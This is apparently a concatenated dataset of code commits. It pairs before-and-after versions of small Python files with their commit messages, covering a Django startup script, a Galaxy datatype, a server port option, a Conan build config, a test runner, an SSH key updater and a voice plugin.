This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.1)
<commit_msg>Increase viewport margin (10% was not enough for small screens)<commit_after>"""
Geotrek startup script.
This is executed only once at startup.
"""
from south.signals import post_migrate
from django.conf import settings
from mapentity.helpers import api_bbox
from geotrek.common.utils.postgresql import load_sql_files
"""
http://djangosnippets.org/snippets/2311/
Ensure South will update our custom SQL during a call to `migrate`.
"""
def run_initial_sql(sender, **kwargs):
app_label = kwargs.get('app')
load_sql_files(app_label)
post_migrate.connect(run_initial_sql, dispatch_uid="geotrek.core.sqlautoload")
"""
Computed client-side setting.
"""
settings.LEAFLET_CONFIG['SPATIAL_EXTENT'] = api_bbox(settings.SPATIAL_EXTENT, buffer=0.5)
|
1b7d84526ac7650f18851610ebef47bdfef828ea | scripts/galaxy/gedlab.py | scripts/galaxy/gedlab.py | """
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import os
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
| """
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
| Fix pylint warning: Unused import os | Fix pylint warning: Unused import os
| Python | bsd-3-clause | Winterflower/khmer,kdmurray91/khmer,souravsingh/khmer,jas14/khmer,kdmurray91/khmer,Winterflower/khmer,F1000Research/khmer,jas14/khmer,ged-lab/khmer,kdmurray91/khmer,ged-lab/khmer,F1000Research/khmer,ged-lab/khmer,F1000Research/khmer,jas14/khmer,Winterflower/khmer,souravsingh/khmer,souravsingh/khmer | """
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import os
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
Fix pylint warning: Unused import os | """
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
| <commit_before>"""
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import os
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
<commit_msg>Fix pylint warning: Unused import os<commit_after> | """
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
| """
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import os
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
Fix pylint warning: Unused import os"""
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
| <commit_before>"""
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import os
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
<commit_msg>Fix pylint warning: Unused import os<commit_after>"""
k-mer count and presence
"""
from galaxy.datatypes.binary import Binary
import logging
log = logging.getLogger(__name__)
class Count(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
class Presence(Binary):
def __init__(self, **kwd):
Binary.__init__(self, **kwd)
Binary.register_unsniffable_binary_ext("ct")
Binary.register_unsniffable_binary_ext("pt")
|
cbd9c312b857565bfebc2d9f8452453ca333ba92 | giles.py | giles.py | #!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
server = giles.server.Server()
server.instantiate()
server.loop()
| #!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
import sys
server = giles.server.Server()
if len(sys.argv) == 2:
port = int(sys.argv[1])
else:
port = 9435
server.instantiate(port)
server.loop()
| Support choosing a port on the command line. | Support choosing a port on the command line.
Just put a number as the only CLI for now. Useful for me testing
changes now that I'm actually keeping the server running.
| Python | agpl-3.0 | sunfall/giles | #!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
server = giles.server.Server()
server.instantiate()
server.loop()
Support choosing a port on the command line.
Just put a number as the only CLI for now. Useful for me testing
changes now that I'm actually keeping the server running. | #!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
import sys
server = giles.server.Server()
if len(sys.argv) == 2:
port = int(sys.argv[1])
else:
port = 9435
server.instantiate(port)
server.loop()
| <commit_before>#!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
server = giles.server.Server()
server.instantiate()
server.loop()
<commit_msg>Support choosing a port on the command line.
Just put a number as the only CLI for now. Useful for me testing
changes now that I'm actually keeping the server running.<commit_after> | #!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
import sys
server = giles.server.Server()
if len(sys.argv) == 2:
port = int(sys.argv[1])
else:
port = 9435
server.instantiate(port)
server.loop()
| #!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
server = giles.server.Server()
server.instantiate()
server.loop()
Support choosing a port on the command line.
Just put a number as the only CLI for now. Useful for me testing
changes now that I'm actually keeping the server running.#!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
import sys
server = giles.server.Server()
if len(sys.argv) == 2:
port = int(sys.argv[1])
else:
port = 9435
server.instantiate(port)
server.loop()
| <commit_before>#!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
server = giles.server.Server()
server.instantiate()
server.loop()
<commit_msg>Support choosing a port on the command line.
Just put a number as the only CLI for now. Useful for me testing
changes now that I'm actually keeping the server running.<commit_after>#!/usr/bin/env python2
# Giles: giles.py, the main loop.
# Copyright 2012 Phil Bordelon
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import giles.server
import sys
server = giles.server.Server()
if len(sys.argv) == 2:
port = int(sys.argv[1])
else:
port = 9435
server.instantiate(port)
server.loop()
|
5d2f585779bef5e8bd82e7f4e7b46818153af711 | build.py | build.py | from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builder.run()
| from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builds = []
for settings, options, env_vars, build_requires, reference in builder.items:
settings["cppstd"] = 14
builds.append([settings, options, env_vars, build_requires])
builder.builds = builds
builder.run()
| Use std 14 in CI | CI: Use std 14 in CI
| Python | mit | zhuhaow/libnekit,zhuhaow/libnekit,zhuhaow/libnekit,zhuhaow/libnekit | from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builder.run()
CI: Use std 14 in CI | from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builds = []
for settings, options, env_vars, build_requires, reference in builder.items:
settings["cppstd"] = 14
builds.append([settings, options, env_vars, build_requires])
builder.builds = builds
builder.run()
| <commit_before>from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builder.run()
<commit_msg>CI: Use std 14 in CI<commit_after> | from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builds = []
for settings, options, env_vars, build_requires, reference in builder.items:
settings["cppstd"] = 14
builds.append([settings, options, env_vars, build_requires])
builder.builds = builds
builder.run()
| from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builder.run()
CI: Use std 14 in CIfrom conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builds = []
for settings, options, env_vars, build_requires, reference in builder.items:
settings["cppstd"] = 14
builds.append([settings, options, env_vars, build_requires])
builder.builds = builds
builder.run()
| <commit_before>from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builder.run()
<commit_msg>CI: Use std 14 in CI<commit_after>from conan.packager import ConanMultiPackager
if __name__ == "__main__":
builder = ConanMultiPackager()
builder.add_common_builds(pure_c=False)
builds = []
for settings, options, env_vars, build_requires, reference in builder.items:
settings["cppstd"] = 14
builds.append([settings, options, env_vars, build_requires])
builder.builds = builds
builder.run()
|
6b4f4f07c442705f76294b9ec9a37d3d02ca1551 | run_tests.py | run_tests.py | #!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if names and re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif names and not names.startswith('tests.'):
names = 'tests.tests.' + names
else:
names = 'tests'
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
| #!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if not names:
names = 'tests'
elif re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif not names.startswith('tests.'):
names = 'tests.tests.' + names
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
| Allow running separate test files | Allow running separate test files
With e.g.:
./runtests.py tests.tests_transactions
| Python | bsd-3-clause | rutube/django-cacheops,Suor/django-cacheops,LPgenerator/django-cacheops,ErwinJunge/django-cacheops,bourivouh/django-cacheops | #!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if names and re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif names and not names.startswith('tests.'):
names = 'tests.tests.' + names
else:
names = 'tests'
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
Allow running separate test files
With e.g.:
./runtests.py tests.tests_transactions | #!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if not names:
names = 'tests'
elif re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif not names.startswith('tests.'):
names = 'tests.tests.' + names
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
| <commit_before>#!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if names and re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif names and not names.startswith('tests.'):
names = 'tests.tests.' + names
else:
names = 'tests'
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
<commit_msg>Allow running separate test files
With e.g.:
./runtests.py tests.tests_transactions<commit_after> | #!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if not names:
names = 'tests'
elif re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif not names.startswith('tests.'):
names = 'tests.tests.' + names
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
| #!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if names and re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif names and not names.startswith('tests.'):
names = 'tests.tests.' + names
else:
names = 'tests'
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
Allow running separate test files
With e.g.:
./runtests.py tests.tests_transactions#!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if not names:
names = 'tests'
elif re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif not names.startswith('tests.'):
names = 'tests.tests.' + names
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
| <commit_before>#!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if names and re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif names and not names.startswith('tests.'):
names = 'tests.tests.' + names
else:
names = 'tests'
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
<commit_msg>Allow running separate test files
With e.g.:
./runtests.py tests.tests_transactions<commit_after>#!/usr/bin/env python
import os, sys, re, shutil
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings'
import django
from django.core.management import call_command
names = next((a for a in sys.argv[1:] if not a.startswith('-')), None)
if not names:
names = 'tests'
elif re.search(r'^\d+$', names):
names = 'tests.tests.IssueTests.test_' + names
elif not names.startswith('tests.'):
names = 'tests.tests.' + names
django.setup()
# NOTE: we create migrations each time since they depend on type of database,
# python and django versions
try:
shutil.rmtree('tests/migrations', True)
call_command('makemigrations', 'tests', verbosity=2 if '-v' in sys.argv else 0)
call_command('test', names, failfast='-x' in sys.argv, verbosity=2 if '-v' in sys.argv else 1)
finally:
shutil.rmtree('tests/migrations')
|
a5ce33cf60deb5a1045a0bf693b58eb20dbad8d2 | sshkeys_update.py | sshkeys_update.py | #!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open('.ssh/authorized_keys', 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
| #!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open(os.path.expanduser('~submit/.ssh/authorized_keys'), 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
| Make sure to write in ~submit's authorized_keys. | Make sure to write in ~submit's authorized_keys.
| Python | bsd-3-clause | pydotorg/pypi,pydotorg/pypi,pydotorg/pypi,pydotorg/pypi | #!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open('.ssh/authorized_keys', 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
Make sure to write in ~submit's authorized_keys. | #!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open(os.path.expanduser('~submit/.ssh/authorized_keys'), 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
| <commit_before>#!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open('.ssh/authorized_keys', 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
<commit_msg>Make sure to write in ~submit's authorized_keys.<commit_after> | #!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open(os.path.expanduser('~submit/.ssh/authorized_keys'), 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
| #!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open('.ssh/authorized_keys', 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
Make sure to write in ~submit's authorized_keys.#!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open(os.path.expanduser('~submit/.ssh/authorized_keys'), 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
| <commit_before>#!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open('.ssh/authorized_keys', 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
<commit_msg>Make sure to write in ~submit's authorized_keys.<commit_after>#!/usr/bin/python
import config, store, os
standalone_py = os.path.join(os.path.dirname(__file__), 'standalone.py')
c = config.Config("config.ini")
s = store.Store(c)
cursor = s.get_cursor()
cursor.execute("lock table sshkeys in exclusive mode") # to prevent simultaneous updates
cursor.execute("select u.name,s.key from users u, sshkeys s where u.name=s.name")
lines = []
for name, key in cursor.fetchall():
lines.append('command="%s -r %s",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty %s\n' %
(standalone_py, name, key))
f = open(os.path.expanduser('~submit/.ssh/authorized_keys'), 'wb')
f.write(''.join(lines))
f.close()
s.rollback()
|
90284fabbbbb1f6e7bda1cf33bdc39a1d76a25d4 | jarviscli/plugins/voice.py | jarviscli/plugins/voice.py | from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
"""Let Jarvis use his voice."""
jarvis.enable_voice()
@plugin('disable sound')
def disable_sound(jarvis, s):
"""Deny Jarvis his voice."""
jarvis.disable_voice()
@plugin('say')
def say(jarvis, s):
"""Reads what is typed."""
if not s:
jarvis.say("What should I say?")
else:
voice_state = jarvis.is_voice_enabled()
jarvis.enable_voice()
jarvis.say(s)
if not voice_state:
jarvis.disable_voice()
| from plugin import plugin
@plugin('enable sound')
def enable_sound(jarvis, s):
